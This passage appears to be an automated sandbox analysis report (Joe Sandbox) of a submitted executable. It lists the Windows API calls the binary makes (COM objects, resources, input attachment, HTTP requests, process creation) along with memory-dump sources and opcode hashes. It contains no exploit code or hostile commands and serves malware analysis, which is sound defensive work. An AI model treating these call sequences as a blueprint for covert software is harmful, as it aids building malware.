                                                                                                                                                                                                                                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                                                                                                                      • API String ID: 1704125052-3381328864
                                                                                                                                                                                                                                                      • Opcode ID: 21b7eda953b679638b51a2e0497d816b31ab80b3712852e0e71a85cd63a5ba51
                                                                                                                                                                                                                                                      • Instruction ID: aca0aa4c20fa47c3f48e8d98a3fa274648698aa5dba3b69bfc5cf3db8c4e2fdd
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 21b7eda953b679638b51a2e0497d816b31ab80b3712852e0e71a85cd63a5ba51
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6011297A70834FF9FA206635DC07DB637ACDB21324B205022FA08F40D5FFA5E851A515
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 00F1B2D5
                                                                                                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 00F1B302
                                                                                                                                                                                                                                                      • CoUninitialize.OLE32 ref: 00F1B30C
                                                                                                                                                                                                                                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 00F1B40C
                                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 00F1B539
                                                                                                                                                                                                                                                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 00F1B56D
                                                                                                                                                                                                                                                      • CoGetObject.OLE32(?,00000000,00F4D91C,?), ref: 00F1B590
                                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000000), ref: 00F1B5A3
                                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00F1B623
                                                                                                                                                                                                                                                      • VariantClear.OLEAUT32(00F4D91C), ref: 00F1B633
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2395222682-0
                                                                                                                                                                                                                                                      • Opcode ID: 4284f5a87bca566932890a964214433a66e5348e1f039b89d55985f8aa4bb5c5
                                                                                                                                                                                                                                                      • Instruction ID: e448898b77d377cf097392560d43383b63beadac27bd213a81029af19cd8045c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4284f5a87bca566932890a964214433a66e5348e1f039b89d55985f8aa4bb5c5
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 56C12371608305EFC700DF68C884A6ABBE9BF89304F04495DF98ADB261DB71ED46DB52
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 00F067FD
                                                                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 00F0680A
                                                                                                                                                                                                                                                        • Part of subcall function 00EE172B: __woutput_l.LIBCMT ref: 00EE1784
                                                                                                                                                                                                                                                      • FindResourceW.KERNEL32(?,?,0000000E), ref: 00F06834
                                                                                                                                                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 00F06840
                                                                                                                                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 00F0684D
                                                                                                                                                                                                                                                      • FindResourceW.KERNEL32(?,?,00000003), ref: 00F0686D
                                                                                                                                                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 00F0687F
                                                                                                                                                                                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 00F0688E
                                                                                                                                                                                                                                                      • LockResource.KERNEL32(?), ref: 00F0689A
                                                                                                                                                                                                                                                      • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00F068F9
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1433390588-0
                                                                                                                                                                                                                                                      • Opcode ID: db9b5dc6bbf326bfcddac1e80f4af8947fde3e0a7c24d026cfdedbd6272f4dea
                                                                                                                                                                                                                                                      • Instruction ID: 0af2d66fe54ac2755183a684128627158a8d34d77d8456e44fc1b88af7309cad
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: db9b5dc6bbf326bfcddac1e80f4af8947fde3e0a7c24d026cfdedbd6272f4dea
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EC316EB5A0025AABDB119F61DD49ABE7BACFF09350F048425F902E2190E774DA61FB60
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00F04047
                                                                                                                                                                                                                                                      • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00F030A5,?,00000001), ref: 00F0405B
                                                                                                                                                                                                                                                      • GetWindowThreadProcessId.USER32(00000000), ref: 00F04062
                                                                                                                                                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F030A5,?,00000001), ref: 00F04071
                                                                                                                                                                                                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00F04083
                                                                                                                                                                                                                                                      • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00F030A5,?,00000001), ref: 00F0409C
                                                                                                                                                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F030A5,?,00000001), ref: 00F040AE
                                                                                                                                                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00F030A5,?,00000001), ref: 00F040F3
                                                                                                                                                                                                                                                      • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00F030A5,?,00000001), ref: 00F04108
                                                                                                                                                                                                                                                      • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00F030A5,?,00000001), ref: 00F04113
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2156557900-0
                                                                                                                                                                                                                                                      • Opcode ID: 3c20042fd2d36bfbfc5bcbb15d8d217f8ca2f36cc39da6f66b930bc984146dd3
                                                                                                                                                                                                                                                      • Instruction ID: 236395b7609ec5284477f94f0f30341d7564faf18b8faad3c3c3a04a8949cfc5
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3c20042fd2d36bfbfc5bcbb15d8d217f8ca2f36cc39da6f66b930bc984146dd3
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E73193B5900208BFDB11DF54DC45BB977A9BBA6721F118105FE05E62E0CBB4A980BF64
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetSysColor.USER32(00000008), ref: 00EDB496
                                                                                                                                                                                                                                                      • SetTextColor.GDI32(?,000000FF), ref: 00EDB4A0
                                                                                                                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 00EDB4B5
                                                                                                                                                                                                                                                      • GetStockObject.GDI32(00000005), ref: 00EDB4BD
                                                                                                                                                                                                                                                      • GetClientRect.USER32(?), ref: 00F3DD63
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001328,00000000,?), ref: 00F3DD7A
                                                                                                                                                                                                                                                      • GetWindowDC.USER32(?), ref: 00F3DD86
                                                                                                                                                                                                                                                      • GetPixel.GDI32(00000000,?,?), ref: 00F3DD95
                                                                                                                                                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00F3DDA7
                                                                                                                                                                                                                                                      • GetSysColor.USER32(00000005), ref: 00F3DDC5
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3430376129-0
                                                                                                                                                                                                                                                      • Opcode ID: 139e785cba956b24c9c8d875b0585899b5495335e3a2401aa4cce95769dc935a
                                                                                                                                                                                                                                                      • Instruction ID: a8f028d8bf41e9020fba00f8f68ce8a2a203d0f50f3ed3fafef6cf5523ff4280
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 139e785cba956b24c9c8d875b0585899b5495335e3a2401aa4cce95769dc935a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CB118135500209EFDB116FA4EC08BE93B65EB56335F118221FE66A51E1DB310942FF10
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • EnumChildWindows.USER32(?,00EFCF50), ref: 00EFCE90
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ChildEnumWindows
                                                                                                                                                                                                                                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                                                                                                                                      • API String ID: 3555792229-1603158881
                                                                                                                                                                                                                                                      • Opcode ID: 29b20715afe07c4edf36499ce4e02611913851fbab5c6e1046a05129df974548
                                                                                                                                                                                                                                                      • Instruction ID: 4bcd599c7e51ed253777283c9b1906794fee7482db465399ee580c2996549a88
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 29b20715afe07c4edf36499ce4e02611913851fbab5c6e1046a05129df974548
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CA91A230A0014E9ACB18EF60C681BFAFBB5FF44304F70A55AD649B7241DF31699ADB90
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00EC30DC
                                                                                                                                                                                                                                                      • CoUninitialize.OLE32(?,00000000), ref: 00EC3181
                                                                                                                                                                                                                                                      • UnregisterHotKey.USER32(?), ref: 00EC32A9
                                                                                                                                                                                                                                                      • DestroyWindow.USER32(?), ref: 00F35079
                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 00F350F8
                                                                                                                                                                                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00F35125
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                                                                                                                                      • String ID: close all
                                                                                                                                                                                                                                                      • API String ID: 469580280-3243417748
                                                                                                                                                                                                                                                      • Opcode ID: 5d00c8d0acaf044b0c74693da661cb1cb829713b140460a73fce933bbbac3562
                                                                                                                                                                                                                                                      • Instruction ID: ffd83f29e00f4059bc4ca6c1c0e9a05578e354ac3f66c69bcece82a8fd6e7911
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5d00c8d0acaf044b0c74693da661cb1cb829713b140460a73fce933bbbac3562
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 939127746002028FC719EF24CA95FA8F3E4BF14714F5492ADE40AA7262DB32AE57DF50
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000EB), ref: 00EDCC15
                                                                                                                                                                                                                                                        • Part of subcall function 00EDCCCD: GetClientRect.USER32(?,?), ref: 00EDCCF6
                                                                                                                                                                                                                                                        • Part of subcall function 00EDCCCD: GetWindowRect.USER32(?,?), ref: 00EDCD37
                                                                                                                                                                                                                                                        • Part of subcall function 00EDCCCD: ScreenToClient.USER32(?,?), ref: 00EDCD5F
                                                                                                                                                                                                                                                      • GetDC.USER32 ref: 00F3D137
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00F3D14A
                                                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00F3D158
                                                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00F3D16D
                                                                                                                                                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00F3D175
                                                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00F3D200
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                                                                                                                                      • String ID: U
                                                                                                                                                                                                                                                      • API String ID: 4009187628-3372436214
                                                                                                                                                                                                                                                      • Opcode ID: b690d6fc4f82984220395902ab8f2873651ec0bc8faa1e7b11a2498f5f936dc2
                                                                                                                                                                                                                                                      • Instruction ID: be3faf28f2713a1279b73c5fec0adf457b868dc7e65f23f8f7bbff6417ef038b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b690d6fc4f82984220395902ab8f2873651ec0bc8faa1e7b11a2498f5f936dc2
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DC71E131800209DFDF25EF64DC81AEA7BB5FF48374F24426AED556A2A6D731C842EB50
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00F145FF
                                                                                                                                                                                                                                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00F1462B
                                                                                                                                                                                                                                                      • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00F1466D
                                                                                                                                                                                                                                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00F14682
                                                                                                                                                                                                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F1468F
                                                                                                                                                                                                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00F146BF
                                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00F14706
                                                                                                                                                                                                                                                        • Part of subcall function 00F15052: GetLastError.KERNEL32(?,?,00F143CC,00000000,00000000,00000001), ref: 00F15067
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1241431887-3916222277
                                                                                                                                                                                                                                                      • Opcode ID: ef941778afa8c29c50a5af396a3a2543f522ce47a9151f11951977a0fddcf6ba
                                                                                                                                                                                                                                                      • Instruction ID: 13e6edb767790a08f5ea73702208ff9a6887f7c9f69ffa9188971e340d5a2ae2
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ef941778afa8c29c50a5af396a3a2543f522ce47a9151f11951977a0fddcf6ba
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2B4181B5901209BFEB059F90CC85FFB7BACFF49758F004016FA059A181D7B4AD84ABA4
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00F5DC00), ref: 00F1B715
                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00F5DC00), ref: 00F1B749
                                                                                                                                                                                                                                                      • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00F1B8C1
                                                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 00F1B8EB
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 560350794-0
                                                                                                                                                                                                                                                      • Opcode ID: cdc9cf597a68be46f251662d8121fae7c280a4f29b47ba4b2e11595e92cc72a8
                                                                                                                                                                                                                                                      • Instruction ID: 47b42fbd39b77545ec021f0b17e51f630a4cb769523df2daea05724fd5369a75
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cdc9cf597a68be46f251662d8121fae7c280a4f29b47ba4b2e11595e92cc72a8
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 04F11A75A00209EFCB04DF94C894EEEB7B9FF49715F108498F905AB250DB35AE86DB50
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00F224F5
                                                                                                                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00F22688
                                                                                                                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00F226AC
                                                                                                                                                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00F226EC
                                                                                                                                                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00F2270E
                                                                                                                                                                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00F2286F
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00F228A1
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00F228D0
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00F22947
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4090791747-0
                                                                                                                                                                                                                                                      • Opcode ID: 0bd4df4f21b81b39a36c6c191255d81ed72d6dcc95e3cc5032485a0277666939
                                                                                                                                                                                                                                                      • Instruction ID: 7fb00138e784c4a268aa233617ed2a9d2e4ee5bc5a2a7aa5898256269c322ecc
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0bd4df4f21b81b39a36c6c191255d81ed72d6dcc95e3cc5032485a0277666939
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AED1AD31604251AFC714EF24D891B6EBBE0EF84320F18855DF999AB3A2DB71DC41DB52
                                                                                                                                                                                                                                                      APIs
